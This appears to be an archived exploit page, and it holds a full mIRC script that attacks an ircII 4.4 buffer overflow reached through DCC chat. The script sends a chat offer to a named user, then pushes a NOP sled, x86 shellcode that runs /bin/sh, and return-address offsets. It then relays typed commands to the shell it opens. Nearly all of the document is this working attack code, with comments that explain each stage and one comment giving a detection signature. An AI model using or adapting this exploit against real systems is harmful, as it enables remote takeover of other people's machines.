
ide_expl.mrc

ide_expl.mrc
Posted Apr 19, 2000
Authored by vade79, realhalo | Site realhalo.org

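ide_expl.mrc is a port of the ircii-4.4.c exploit (an ircII 4.4 buffer overflow reached through DCC chat) to an mIRC 5.7 script. It works in the reverse direction to ircii-4.4.c: you send the chat request instead of having the target chat you. The payload attempts to execute /bin/sh. The script's own header notes the bug as affecting V4.4 and patched in V4.4M.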

tags | exploit
SHA-256 | 07bb96538921b3cdfee62b6c246d8843f69f27f4c4ae7b182d900f7f81eee2fb

ide_expl.mrc

; ide_expl.mrc: vade79 -> _v9[v9@fakehalo.org], www.fakehalo.org.
;
; ircii-4-4 exploit->ported to mirc5.7, works reverse to ircii-4.4.c. You send the chat
; request instead of having them chat you, result is the same.
;
; Wrote directly from ircii-4.4.c(for *nix), that someone gave me to port to mirc.
;
; Exploit to overflow a buffer. More often than not, though, the target client will simply
; crash/seg fault with either version of this exploit when the default offsets are used.
; (exploit noted as being for V4.4, and patched in V4.4M)
;
; ircii-4.4.c by: bladi & aLmUDeNa.
; ide_expl.mrc(this) by: _v9(vade79).
;
; Also included in the exploit(ircii4.4.c) were some other offsets:
;
; "SuSe 6.x :0xbfffe3ff"
; "RedHat :0xbfffe888"
;
; To load this script into mIRC5.7: /load -rs <path/to/file.mrc>
;
; NOTE: While making this i noticed /sockwrite had some problems catching up on checking to see if
; the connection still exists, so if you see a /sockwrite error in the status window, the user
; probably seg faulted.

; bin: convert one two-character hex token to its numeric value.
;   $1      - the two-character token (as produced by make_string's tokenising).
;   returns - (high digit * 16) + low digit; returns nothing if $1 is not exactly 2 chars.
; A non-numeric character is mapped with $asc(char) - 87, which gives 10-15 only for
; lowercase a-f; uppercase hex letters are not covered by this arithmetic.
alias -l bin {
; Reject anything that is not exactly two characters.
if ($len($1) != 2) { return }
var %i, %j, %k
; %i = value of the first (high) character.
if ($left($1,1) !isnum) { %i = $calc($asc($left($1,1)) -87)) }
else { %i = $left($1,1) }
; %j = value of the second (low) character.
if ($right($1,1) !isnum) { %j = $calc($asc($right($1,1)) -87)) }
else { %j = $right($1,1) }
; Add 16 to %k once per unit of the high digit (i.e. %k = %i * 16), counting %i down to 0.
while (%i) { %k = %k + 16 | dec %i }
return $calc(%k + %j)
}
; make_string: turn a "\xNN\xNN..." literal into a space-separated list of byte values.
;   $1      - text made of \xNN escapes.
;   returns - the values produced by $bin for each NN, separated by spaces, in order.
; The callers in this file pass the result straight to /bset as its list of byte values.
alias -l make_string {
var %i = 1, %j
; "\x" is collapsed to "\" so the string can be split on character 92 (backslash);
; token 0 of $gettok gives the number of tokens, which bounds the loop.
while ($gettok($replace($1,\x,\),0,92) >= %i) {
; Append the decoded value of token %i to the running list.
%j = %j $bin($gettok($replace($1,\x,\),%i,92))
inc %i
}
return %j
}
; wn: returns the name of the custom window this script uses for its status output.
; Every "$window($wn)" test in the file checks whether that window is still open.
alias -l wn return @ircii4.4_dcc_exploit
; sw: guarded wrapper around /sockwrite.
;   $1- - the arguments handed unchanged to /sockwrite (socket name plus data, optionally
;         preceded by a switch such as -n, as the INPUT handler does).
; Does nothing unless at least two arguments are given. The liveness check always looks at
; the socket named exp_ide, whatever name was passed in.
alias -l sw {
if ($2) {
; Socket no longer active: close the status window and report the stage reached.
if ($sock(exp_ide).status != active) {
if ($window($wn)) { window -c $wn }
echo -a Connection lost/non-existant. ( $+ %ide.status $+ )
}
else {
; Show the last thing written in the window title ($chr(91)/$chr(93) are "[" and "]").
if ($window($wn)) { titlebar $wn $chr(91) data sent to socket(last): $1- $chr(93) }
sockwrite $1-
}
}
}
; main: open the status window, start a local listener and send the DCC CHAT offer.
;   $1 - nick of the client the offer is sent to (stored in %ide.nick).
; The rest of the run happens in the SOCKLISTEN handler once the offer is accepted.
alias -l main {
; Recreate the status window from scratch.
if ($window($wn)) { window -c $wn } | window -aek $wn
echo $wn *** [01]: sending DCC chat request, waiting...
; Pick a random listening port in 1024-4096 and re-roll until $portfree reports it free.
set %ide.nick $1 | set %ide.port $rand(1024,4096)
while ($portfree(%ide.port) != $true) { set %ide.port $rand(1024,4096) }
; Listen locally on that port under the socket name exp_ide_base.
sockclose exp_ide_base | socklisten exp_ide_base %ide.port
; Raw PRIVMSG carrying a CTCP ($chr(1)-delimited) "DCC CHAT chat <longip> <port>" offer
; that advertises this host's address and the port chosen above.
.quote privmsg $1 : $+ $chr(1) $+ DCC CHAT chat $longip($ip) %ide.port $+ $chr(1)
}
; exploit_ircii: the user-facing command, /exploit_ircii <nick>.
; Runs only while connected to a server ($server is set). It refuses to start if the
; status window is already open or if mIRC is older than 5.7, prints the syntax when no
; nick is given, and otherwise hands the nick to main.
alias exploit_ircii {
if ($server) {
if ($window($wn)) { echo -a *** Close the exploit window before attempting to exploit. | halt }
elseif ($version < 5.7) { echo -a *** Functions in this script require mIRC5.7 or greater. (aborted) | halt }
elseif ($1) { main $1 }
else { echo -a Syntax: /exploit_ircii <nick> }
}
}
; SOCKREAD on exp_ide: print whatever the remote end sends into the status window.
; Stops on a socket error, or as soon as a read returns no bytes ($sockbr == 0).
on 1:SOCKREAD:exp_ide: {
if ($sockerr > 0) return
:read
sockread %data
if ($sockbr == 0) return
; An empty read is shown as the placeholder text "(no data)".
if (%data == $null) var %data = (no data)
if ($window($wn)) { echo $wn -> %data }
; Loop until the receive buffer is drained.
goto read
}
; SOCKLISTEN on exp_ide_base: fires when the remote client connects to the listener.
; Accepts the connection as exp_ide, closes the listener, and, if the status window is
; still open, builds three binary variables and writes them to the socket in four
; stages. %ide.status is incremented after each stage (1-4) so the other handlers can
; report how far the run got. If the window was closed meanwhile, the connection is
; dropped instead.
; NOTE(review): for detection, the accepted DCC CHAT stream opens with 47 x 16 = 752
; bytes of 0x90 instead of chat text, followed by binary data and the text "/bin/sh".
on 1:SOCKLISTEN:exp_ide_base: {
; Only one connection is taken: accept it, then stop listening.
sockclose exp_ide | sockaccept exp_ide | sockclose exp_ide_base
unset %ide.status
if ($window($wn)) {
set %ide.status 0
echo $wn *** [02]: connected, setting up binary variables. (nops/shell code/etc)
; &nops: sixteen 0x90 bytes.
bset &nops 1 $make_string(\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90)
; &o: the four-byte value that is written repeatedly in stage 3.
bset &o 1 $make_string(\xff\xbf\xff\xe3)
; ^- try different offsets here.
; &shellcode: the byte string below, with the text "/bin/sh" appended after its last byte.
bset &shellcode 1 $make_string(\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff)
bset -t &shellcode $calc($bvar(&shellcode,0) +1) /bin/sh
echo $wn *** [03]: attempting to overflow buffer, sending the variables. (nops/shell code/etc)
inc %ide.status
echo $wn *** [--]: * (1/4) sending the nops, looping 47 times.
; Stage 1: write &nops 47 times.
var %i = 0
while (%i < 47) {
sw exp_ide &nops
inc %i
}
inc %ide.status
echo $wn *** [--]: * (2/4) sent, now sending the shell code.
; Stage 2: write &shellcode once.
sw exp_ide &shellcode
; Empty counting loop; presumably a crude delay (see the /sockwrite note in the file header).
%i = 0 | while (%i < 9999) { inc %i }
inc %ide.status
echo $wn *** [--]: * (3/4) sent, now waiting/continuing, looping 299 times.
; Stage 3: 299 passes, each writing the bytes of &o one at a time.
%i = 0
while (%i < 299) {
; Another empty counting loop before each pass.
var %j = 0 | while (%j < 499) { inc %j }
var %j = 1
; Walk &o from position 1; the loop ends when $bvar returns 0 or nothing.
while ($bvar(&o,%j)) {
bset &bit 1 $bvar(&o,%j)
sw exp_ide &bit
inc %j
}
inc %i
}
inc %ide.status
echo $wn *** [--]: * (4/4) sent, done.
}
else { sockclose exp_ide }
}
; SOCKCLOSE on exp_ide: the remote end closed the connection.
; Closes the status window, reports the nick and the last stage number reached
; (%ide.status), then clears all %ide.* variables.
on 1:SOCKCLOSE:exp_ide: {
if ($window($wn)) { window -c $wn }
echo -a *** Connection lost with %ide.nick $+ . ( $+ %ide.status $+ )
unset %ide.*
}
; CLOSE on any custom (@) window: when the window being closed is this script's status
; window, tear down both sockets (the connection and the listener) and clear the
; script's %ide.* variables.
on 1:CLOSE:@: {
if ($target == $wn) {
if ($sock(exp_ide)) { sockclose exp_ide }
if ($sock(exp_ide_base)) { sockclose exp_ide_base }
unset %ide.*
}
}
; INPUT on any custom (@) window: handles text typed into this script's status window.
; The typed line is echoed and written to exp_ide (via sw -n) only when the socket is
; active and all four send stages have finished (%ide.status == 4); otherwise an error
; is shown. halt stops mIRC's default handling of the input.
on 1:INPUT:@: {
if ($active == $wn) {
if ($sock(exp_ide).status == active) {
if (%ide.status != 4) { echo *** Error, status is not at 4 yet, wait for completion. }
else { echo $wn <- $1- | sw -n exp_ide $1- }
}
else { echo $wn *** Error, socket status isn't online yet. }
halt
}
}
; LOAD: runs once when the script file is loaded.
; On mIRC older than 5.7 it prints an error and unloads itself; otherwise it prints the
; usage line for /exploit_ircii.
on 1:LOAD: {
if ($version < 5.7) { echo -a *** Functions in this script( $+ $nopath($script) $+ ) require mIRC5.7 or greater. (aborted) | .unload -rs $script | halt }
else { echo -a *** Loaded $nopath($script) $+ , syntax is: /exploit_ircii <nick>. }
}